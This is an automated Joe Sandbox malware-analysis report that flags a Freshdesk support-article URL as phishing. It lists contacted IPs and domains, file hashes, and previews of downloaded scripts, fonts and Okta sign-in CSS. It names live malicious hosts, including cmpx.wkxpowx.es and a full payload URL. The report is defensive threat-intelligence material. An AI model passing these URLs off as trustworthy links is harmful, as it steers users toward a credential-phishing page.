                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://enervit.freshdesk.com/assets/misc/favicon.ico?702017false
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://enervit.freshdesk.com/assets/misc/logo.pngfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://www.recaptcha.net/recaptcha/enterprise/anchor?ar=1&k=6LdvejUUAAAAAEn6wjOFcPVRyQr4KtAJ03ltA1SQ&co=aHR0cHM6Ly9lbmVydml0LmZyZXNoZGVzay5jb206NDQz&hl=en&v=J79K9xgfxwT6Syzx-UyWdD89&theme=light&size=normal&cb=948lpdq12c8ifalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://enervit.freshdesk.com/assets/cdn/portal/scripts/marketplace.jsfalse
                                                                                • Avira URL Cloud: safe
                                                                                unknown
                                                                                https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0false
                                                                                  unknown
                                                                                  https://a.nel.cloudflare.com/report/v4?s=GIRTnAzUOM8w9h5YUnEmjpTU2UnAFdbPMd0Lz0kEDQxHV1ACzqaFkBCxC4O63Y2BRH1XqgvyaqSwesbAaf6TNCV%2F4q6EiAbhwRz8orNu8yDlkN7thpN5%2BXckXC0Vfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://enervit.freshdesk.com/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0/hitfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  142.250.185.106
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  142.250.181.238
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  142.250.185.142
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  185.199.109.133
                                                                                  objects.githubusercontent.comNetherlands
                                                                                  54113FASTLYUSfalse
                                                                                  54.163.169.242
                                                                                  enervit.freshdesk.comUnited States
                                                                                  14618AMAZON-AESUSfalse
                                                                                  151.101.66.137
                                                                                  code.jquery.comUnited States
                                                                                  54113FASTLYUSfalse
                                                                                  104.21.58.72
                                                                                  cmpx.wkxpowx.esUnited States
                                                                                  13335CLOUDFLARENETUStrue
                                                                                  142.250.184.227
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  35.190.80.1
                                                                                  a.nel.cloudflare.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  184.72.189.255
                                                                                  unknownUnited States
                                                                                  14618AMAZON-AESUSfalse
                                                                                  216.58.212.174
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.16.2.189
                                                                                  developers.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.250.184.202
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  216.58.212.170
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  172.67.157.122
                                                                                  unknownUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.250.186.35
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  142.250.185.67
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.17.24.14
                                                                                  cdnjs.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  1.1.1.1
                                                                                  unknownAustralia
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  142.250.186.36
                                                                                  www.google.comUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  108.177.15.84
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  52.222.225.5
                                                                                  assets1.freshdesk.comUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  104.21.32.1
                                                                                  b2xigd.xqwqkd.ruUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  52.217.205.128
                                                                                  s3.amazonaws.comUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  216.58.206.67
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  104.18.95.41
                                                                                  challenges.cloudflare.comUnited States
                                                                                  13335CLOUDFLARENETUSfalse
                                                                                  140.82.121.4
                                                                                  github.comUnited States
                                                                                  36459GITHUBUSfalse
                                                                                  142.250.181.227
                                                                                  www.recaptcha.netUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  13.33.187.96
                                                                                  d19d360lklgih4.cloudfront.netUnited States
                                                                                  16509AMAZON-02USfalse
                                                                                  142.250.185.195
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  172.217.16.195
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  172.217.16.131
                                                                                  unknownUnited States
                                                                                  15169GOOGLEUSfalse
                                                                                  IP
                                                                                  192.168.2.16
                                                                                  192.168.2.6
                                                                                  Joe Sandbox version:42.0.0 Malachite
                                                                                  Analysis ID:1642923
                                                                                  Start date and time:2025-03-19 12:32:53 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                                  Sample URL:https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualità
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:16
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • EGA enabled
                                                                                  Analysis Mode:stream
                                                                                  Analysis stop reason:Timeout
                                                                                  Detection:MAL
                                                                                  Classification:mal96.phis.evad.win@24/44@83/289
                                                                                  • Exclude process from analysis (whitelisted): svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 142.250.185.195, 142.250.185.142, 108.177.15.84, 142.250.181.238, 142.250.186.110, 142.250.184.238, 142.250.185.110, 142.250.184.202, 172.217.16.131, 216.58.212.170, 216.58.206.42, 142.250.185.138, 142.250.74.202, 142.250.186.42, 142.250.185.74, 142.250.185.234, 142.250.185.106, 142.250.186.106, 142.250.186.138, 142.250.186.74, 142.250.186.170, 142.250.185.202, 142.250.181.234, 142.250.185.170, 172.217.16.202, 142.250.185.67, 216.58.206.67
                                                                                  • Excluded domains from analysis (whitelisted): fonts.googleapis.com, clients2.google.com, accounts.google.com, redirector.gvt1.com, content-autofill.googleapis.com, fonts.gstatic.com, clientservices.googleapis.com, clients.l.google.com, www.gstatic.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                  • VT rate limit hit for: https://enervit.freshdesk.com/en/support/solutions/articles/156000285380-prossimo-cambio-di-qualit%C3%A0
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (32777)
                                                                                  Category:downloaded
                                                                                  Size (bytes):128981
                                                                                  Entropy (8bit):5.213230507375328
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:79E4F89981C746A5B6AAB78EB72D5FB5
                                                                                  SHA1:E029B53FC75206E1D0D15766FE37B4CCDCB0E17B
                                                                                  SHA-256:555E99EC255E205DE4C01593A809AD76195497DB51FE5C3185461183334DC479
                                                                                  SHA-512:B964F4080AB61300B17790EE0AD7724FE9CAF08147195F641ED22B8EB87AD0B9B38E12623FAABD5A438A056439640A20B316489422F4F6C3D3A8B2B234F35F71
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/scripts/marketplace.js
                                                                                  Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[93],{0:function(e,t,n){"use strict";function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),n.push.apply(n,r)}return n}function i(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?r(Object(n),!0).forEach(function(t){h()(e,t,n[t])}):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):r(Object(n)).forEach(function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))})}return e}function a(e){"loading"!==document.readyState?e():document.addEventListener("DOMContentLoaded",e)}function s(){var e,t=navigator,n=t.userAgent;return n.match(/chrome|chromium|crios/i)?e="chrome":n.match(/firefox|fxios/i)?e="firefox":n.match(/safari/i)?e="safari":n.match(/opr\//i)?e="opera":n.match(/edg/i)&&(e="edge"),e}function o(e){var t
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (10017)
                                                                                  Category:downloaded
                                                                                  Size (bytes):10245
                                                                                  Entropy (8bit):5.437589264532084
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:6C20A2BE8BA900BC0A7118893A2B1072
                                                                                  SHA1:FF7766FDE1F33882C6E1C481CEED6F6588EA764C
                                                                                  SHA-256:B1C42ACD0288C435E95E00332476781532ED002CAC6F3DCEE9110CED30B31500
                                                                                  SHA-512:8F80AD8ADC44845D24E13D56738A2CA2A73EE6FCDC187542BA4AAEBBF8817935D053A2ACFB0D425B9CC0C582B5091E1C9FE16B90B3AA682187645067C267FC41
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://objects.githubusercontent.com/github-production-release-asset-2e65be/2925284/11f3acf8-4ccb-11e6-8ce4-c179c0a212de?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250319%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250319T113313Z&X-Amz-Expires=300&X-Amz-Signature=6bc698bb2346aba5f4f71fc08e9cb2967a9df4bb20c0f3d7cc485b5365a2b345&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Drandexp.min.js&response-content-type=application%2Foctet-stream
                                                                                  Preview://.// randexp v0.4.3.// Create random strings that match a given regular expression..//.// Copyright (C) 2016 by Roly Fentanes (https://github.com/fent).// MIT License.// http://github.com/fent/randexp.js/raw/master/LICENSE .//.!function(){var e="RandExp",t=function(){return function e(t,n,r){function o(s,i){if(!n[s]){if(!t[s]){var u="function"==typeof require&&require;if(!i&&u)return u(s,!0);if(a)return a(s,!0);var p=new Error("Cannot find module '"+s+"'");throw p.code="MODULE_NOT_FOUND",p}var h=n[s]={exports:{}};t[s][0].call(h.exports,function(e){var n=t[s][1][e];return o(n?n:e)},h,h.exports,e,t,n,r)}return n[s].exports}for(var a="function"==typeof require&&require,s=0;s<r.length;s++)o(r[s]);return o}({1:[function(e,t,n){function r(e){return e+(e>=97&&122>=e?-32:e>=65&&90>=e?32:0)}function o(){return!this.randInt(0,1)}function a(e){return e instanceof h?e.index(this.randInt(0,e.length-1)):e[this.randInt(0,e.length-1)]}function s(e){if(e.type===p.types.CHAR)return new h(e.value);if(e.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (32830)
                                                                                  Category:downloaded
                                                                                  Size (bytes):125261
                                                                                  Entropy (8bit):5.3045422279116075
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:6555A701311270B800D15CD413562BB3
                                                                                  SHA1:B70727B8D3EE95D777F32778CD6B614C52C13BCA
                                                                                  SHA-256:4419B25E9D092B2B47B5936577E26C8C907FBC3E6880414E42EA6FE1F6F2054C
                                                                                  SHA-512:A98B9A66E2FB83F27D0B767AC59E61601A452A64BF63586BE5BDF361633CFAD288EFAC9AC6B326E2A4A59299937CCFD4AFA741D78A2F55D4D37278676EDE5B0C
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/scripts/bottom.js
                                                                                  Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[40],{0:function(e,t,n){"use strict";function r(e,t){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(e);t&&(r=r.filter(function(t){return Object.getOwnPropertyDescriptor(e,t).enumerable})),n.push.apply(n,r)}return n}function o(e){for(var t=1;t<arguments.length;t++){var n=null!=arguments[t]?arguments[t]:{};t%2?r(Object(n),!0).forEach(function(t){d()(e,t,n[t])}):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(n)):r(Object(n)).forEach(function(t){Object.defineProperty(e,t,Object.getOwnPropertyDescriptor(n,t))})}return e}function i(e){"loading"!==document.readyState?e():document.addEventListener("DOMContentLoaded",e)}function a(){var e,t=navigator,n=t.userAgent;return n.match(/chrome|chromium|crios/i)?e="chrome":n.match(/firefox|fxios/i)?e="firefox":n.match(/safari/i)?e="safari":n.match(/opr\//i)?e="opera":n.match(/edg/i)&&(e="edge"),e}function s(e){var t
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                  Category:downloaded
                                                                                  Size (bytes):93276
                                                                                  Entropy (8bit):7.997636438159837
                                                                                  Encrypted:true
                                                                                  SSDEEP:
                                                                                  MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                  SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                  SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                  SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/GDSherpa-vf2.woff2
                                                                                  Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                  Category:dropped
                                                                                  Size (bytes):17842
                                                                                  Entropy (8bit):7.821645806304586
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:4B52ECDC33382C9DCA874F551990E704
                                                                                  SHA1:8F3BF8E41CD4CDDDB17836B261E73F827B84341B
                                                                                  SHA-256:CCE050CC3B150C0B370751021BB15018EE2B64AC369E230FE3B571A9B00D4342
                                                                                  SHA-512:AC3D3C82BAD9147AE5F083ED49C81A744F672DDFBB262135AA3F2C6601F8DFFEA11D8E323CEF025C36D76C6F2515AA6814B622CF504CA01D13346E9EA989048F
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview:RIFF.E..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH.,...$.m.8..k.\.oDL.. ..TU....3'.{.g..6..2...6.DL`e..."&@..b.#&@......T.....'.....$......1.d...G........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........?.........._...........................?...Z5[...B,.c...V-...m.0.../..?...............?.......?................_.....-...M.B.....=....C...[......w .X...ea.............VW.?b....[[.o^.Y.K...OD
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28584, version 1.66
                                                                                  Category:downloaded
                                                                                  Size (bytes):28584
                                                                                  Entropy (8bit):7.992563951996154
                                                                                  Encrypted:true
                                                                                  SSDEEP:
                                                                                  MD5:17081510F3A6F2F619EC8C6F244523C7
                                                                                  SHA1:87F34B2A1532C50F2A424C345D03FE028DB35635
                                                                                  SHA-256:2C7292014E2EF00374AEB63691D9F23159A010455784EE0B274BA7DB2BCCA956
                                                                                  SHA-512:E27976F77797AD93160AF35714D733FD9E729A9981D8A6F555807981D08D8175E02692AA5EA6E59CEBD33895F5F6A3575692565FDD75667630DAB158627A1005
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/GDSherpa-regular.woff2
                                                                                  Preview:wOF2......o.......6x..oG...B.......................>....`..<.<..b.....h..B.6.$..x..>.. ..'..{...[x"q..].....hJ....'.......6.2.[....q....z..mCww...*.eU..S.........0..S.s..,....\.e..F.&....oU*R.}Q.C..2.TD....5..#..h.H.2.|<.1.z..].xZ...z..z..W.........p%..F.e.r"yG.......f.M3.].U.p...E..<..:..j..E......t....!....~a...J.m....f.d.eE..>.:.9.....,6K{.q..6e..4:z......{.{....$.. ...B....9:0.G..6.9R....m..jCW.m.]:{.p..?P.O.B..E....u.J.._..........dd=. l..SJ..fjm....\....)...6......mV.`.J.R.A..R.....J...T.y.........m...k-....{'.Ud"...C.$d*.N 9}.N]..2p.q.T..6.-A.U...."..o.\......uh...$..4j..v...9....anl/NT....K....k..A...........U5S.=.t[.)/s.R.......F..)6H A..'?!....7S.....w:.%.H.@...l?...lm..lUd D...-.... .......5).`..w&..Q....-.. ...9.Xt./SQ?.s+u.9..\.h.l.G.#.*..#@.F..f.1.f..=`....p.....=c..f=..p 4By.u.z'...$;.s.....z.....X..n6y-...........<.......X......~+j.z.j.......7.PD..O..w..9..8].!~C&.......*LCE..Nf~.N.eJ.iXnX*C.&....t.U..Nr.@..lZ.... .X..
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):28
                                                                                  Entropy (8bit):4.307354922057605
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:065D3517CE29FD8B92F28E2BE1DA76E2
                                                                                  SHA1:6858B0939A3E667A29B0D830EE1AD739552F0961
                                                                                  SHA-256:54254616539BB2B85231EB61A40F1DD3802E1CD4AC766B02A53ADEFBD9CD3764
                                                                                  SHA-512:E692A6A575C62D592FB98425B8B8039D6B747A202FF19A4E8E58663573A087D4D7FF4571B7FB35814BA4340B42A0CB1C89DD9BC1E884F13C62BA8E841E6873F1
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://content-autofill.googleapis.com/v1/pages/ChRDaHJvbWUvMTM0LjAuNjk5OC4zNhIgCSFzsk-e5R-XEgUNnkQuhRIFDTkSQs8hiYs0gZsuiRk=?alt=proto
                                                                                  Preview:ChIKBw2eRC6FGgAKBw05EkLPGgA=
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                                                                  Category:downloaded
                                                                                  Size (bytes):28000
                                                                                  Entropy (8bit):7.99335735457429
                                                                                  Encrypted:true
                                                                                  SSDEEP:
                                                                                  MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                                                                  SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                                                                  SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                                                                  SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/GDSherpa-bold.woff2
                                                                                  Preview:wOF2......m`......$...l....B.......................6....`..<.<..b.....$....6.$..x..>.. .....{...[..q.k.]]O....s...|..n...!..[<;....P&..g....!..I'i..Q.DP....9..J......9G..Q1(..)Jn......8Y......)J.F.c A..7k.v...2=.Z.n.4`...~Nl...4;...S.l{w..:.#..=!. ..X....>[.7........1??.3.?t..qE..f...b...,.Fwcp8...4^.^x..|....Ro<%.."....~0..q..rP..G.......R....-..{O.QeJ.....6.E........{.{.....,h.!.._......$..3..cF@..>........t.o...Fc ...YS.....s.V..j....uk.`n......#....6.....1`kbd..Z..).x...F........T.._..}...p..._F.0.S'.V.g........3.$...Jf.j._,J....v7(...(..bm.....a....Nh.(QS.H...5.w.o.1.[<m.1.cJ......B......R..L..>[|@..]../...6.\..(.j.Bn...Oj.&/j@.'T...w.,...*...e.g.I=.w.x..ap..?.......lI../..uuDH.P.....)._...<..C.x.......Kh.P.|"M..JQ......?`..S@{..o..RjCE.qx.p.!(Wi....dY.%./r.#.p..C ..........r.o4P.}...3X..].....6.'~&...]...*y...YQ..9."v....3...oEMQoWM.W`................Y.V..O2......l....p.1..B..Fn..o.<..,C......^.Y.C...W..tX..|.`...5:.Yd@]..j..$...v.
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (51734)
                                                                                  Category:downloaded
                                                                                  Size (bytes):222931
                                                                                  Entropy (8bit):5.0213311632628725
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:0329C939FCA7C78756B94FBCD95E322B
                                                                                  SHA1:7B5499B46660A0348CC2B22CAE927DCC3FDA8B20
                                                                                  SHA-256:0E47F4D2AF98BFE77921113C8AAF0C53614F88FF14FF819BE6612538611ED3D1
                                                                                  SHA-512:1E819E0F9674321EEE28B3E73954168DD5AEF2965D50EE56CAD21A83348894AB57870C1C398684D9F8EAB4BBBEF5239F4AEA1DCAB522C61F91BD81CF358DA396
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://ok4static.oktacdn.com/assets/js/sdk/okta-signin-widget/7.18.0/css/okta-sign-in.min.css
                                                                                  Preview:@charset "UTF-8";.qtip{box-shadow:none;direction:ltr;display:none;font-size:10.5px;left:-28000px;line-height:12px;max-width:280px;min-width:50px;padding:0;position:absolute;top:-28000px}.qtip-content{word-wrap:break-word;padding:5px 9px;text-align:left}.qtip-content,.qtip-titlebar{overflow:hidden;position:relative}.qtip-titlebar{border-width:0 0 1px;font-weight:700;padding:5px 35px 5px 10px}.qtip-titlebar+.qtip-content{border-top-width:0!important}.qtip-close{border:1px solid transparent;cursor:pointer;outline:medium none;position:absolute;right:-9px;top:-9px;z-index:11}.qtip-titlebar .qtip-close{margin-top:-9px;right:4px;top:50%}* html .qtip-titlebar .qtip-close{top:16px}.qtip-icon .ui-icon,.qtip-titlebar .ui-icon{direction:ltr;display:block;text-indent:-1000em}.qtip-icon,.qtip-icon .ui-icon{-moz-border-radius:3px;-webkit-border-radius:3px;border-radius:3px;text-decoration:none}.qtip-icon .ui-icon{background:transparent none no-repeat -100em -100em;color:inherit;height:14px;line-heigh
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (2559), with no line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):2559
                                                                                  Entropy (8bit):5.1812474583423445
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:9363261B7CA99A9D9E0C2E7E880BC3C1
                                                                                  SHA1:28F640B1EBFE83793A2A789C62EDF79BB7502B50
                                                                                  SHA-256:038D1FFF55564945BAD3D92CEA30AC4D77D54226B4E3646B15B68FAE7C1FA084
                                                                                  SHA-512:62D6696157DCB0686D6515F59DB7E55AE44C66F9A4919847DBC61BC9E71A0492D1254EAF067F423E42E5E1F6DD8BFAA742B8571C65E30CD51F622ED19CD73A86
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://enervit.freshdesk.com/assets/cdn/portal/scripts/integrations.js
                                                                                  Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[44],{254:function(e,t,n){"use strict";n.r(t);var r=n(28);if(function(){function e(){dataLayer.push(arguments)}if(window.store.googleAnalytics){var t=window.store.googleAnalytics,n=t.account_number,a=t.domain,o=t.ga4;if(n){var i;o?(window.dataLayer=window.dataLayer||[],e("js",new Date),a&&e("set","linker",{domains:[a]}),e("config",n),i="https://www.googletagmanager.com/gtag/js?id=".concat(n)):(window._gaq=window._gaq||[],window._gaq.push(["_setAccount",n]),window._gaq.push(["_addDevId","00P19"]),a&&window._gaq.push(["_setDomainName",a]),window._gaq.push(["_trackPageview"]),i="".concat("https:"===document.location.protocol?"https://ssl":"http://www",".google-analytics.com/ga.js"));var s={type:"text/javascript",async:!0,src:i};Object(r.a)(s,!0)}}}(),function(){if(window.store.freshchat){var e=window.store,t=e.currentLocale,n=e.account.id,a=e.portal.id,o=e.user;o=void 0===o?{}:o;var i=o.name,s=o.email,c=e.freshchat,u=c.token,l=c.visitor_
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:ASCII text, with very long lines (590)
                                                                                  Category:downloaded
                                                                                  Size (bytes):558604
                                                                                  Entropy (8bit):5.709733010176998
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:6A36163AA0BBF83AB5D1C9FE0FF046C7
                                                                                  SHA1:B5D6C2EB38480243E8527D29030A895E4558F0B4
                                                                                  SHA-256:430AA09E2AEC35F41AFAC94B13F2550D632F4D12D14549AD3344CF29AA9F40A2
                                                                                  SHA-512:A9299850AB3FDEB4E86DA6E8A1D66F4B9C80BAD0E4CFB0105A7D2DCC7FF380181A611B8681B639E46815BEC3DE31DCAA700FD655C23F8896D42391328FEE4663
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://www.gstatic.com/recaptcha/releases/J79K9xgfxwT6Syzx-UyWdD89/recaptcha__en.js
                                                                                  Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var U=function(){return[function(f,V,Z,P,X,D,G,k,H,w,A,S,n,r,K,M,R,t,z,F,g,L,d,v,O,E,m,N,b,q,fc,e,B,V0,l,PL,HL,kK,cL){return f>>((((f&(kK=[1846,2,33],(f<<kK[1]&7)<kK[1]&&(f>>kK[1]&13)>=7&&(cL=Z.M*4294967296+(Z.o>>>V)),93))==f&&c.call(this,V),f)>>1&kK[1])==kK[1]&&(D=[1,191,1213],V.O$?(R=V.Km,S=V.lP,A=J[5](4,12),b=C[16](52,A),M=b.next().value,F=b.next().value,X=b.next().value,K=b.next().value,l=b.next().value,m=b.next().value,PL=b.next().value,b.next(),b.next(),G=b.next().value,b.next(),B=b.next().value,.e=[C[1](65,S,x[32](6,S),x[32](6,kK[0])),x[27](78,S,x[32](kK[2],S),x[32](6,D[kK[1]])),Q[26](22,S,x[32](65,S),x[32]
                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                  File Type:HTML document, ASCII text, with very long lines (52009), with CRLF line terminators
                                                                                  Category:downloaded
                                                                                  Size (bytes):150056
                                                                                  Entropy (8bit):6.027653403887745
                                                                                  Encrypted:false
                                                                                  SSDEEP:
                                                                                  MD5:57649FB85822CD8BECDE56E42F542C6E
                                                                                  SHA1:02C1BF0143ADF92557F5CE17A7E980809A1D8DD2
                                                                                  SHA-256:28ECC338ECACE65A43709AA17D03E0EDEFBA48C8D17EFC01F5893D922B054BE4
                                                                                  SHA-512:236BF32F49CC330C2CCA73CFFE723ACEC0E7980C53CAD13936AD8A51E4CEAE0A20DC4756DFCD309B8DF1BA6B7C815107F1899BA2787F796563FF110AF00BF73A
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  URL:https://cmpx.wkxpowx.es/dkdlrubjpegzpaxtklsphng3nf8un79ojvfwu7zpck4?FQJAIDJEVZDQZIFFPZMIXZRPVVOLNJ
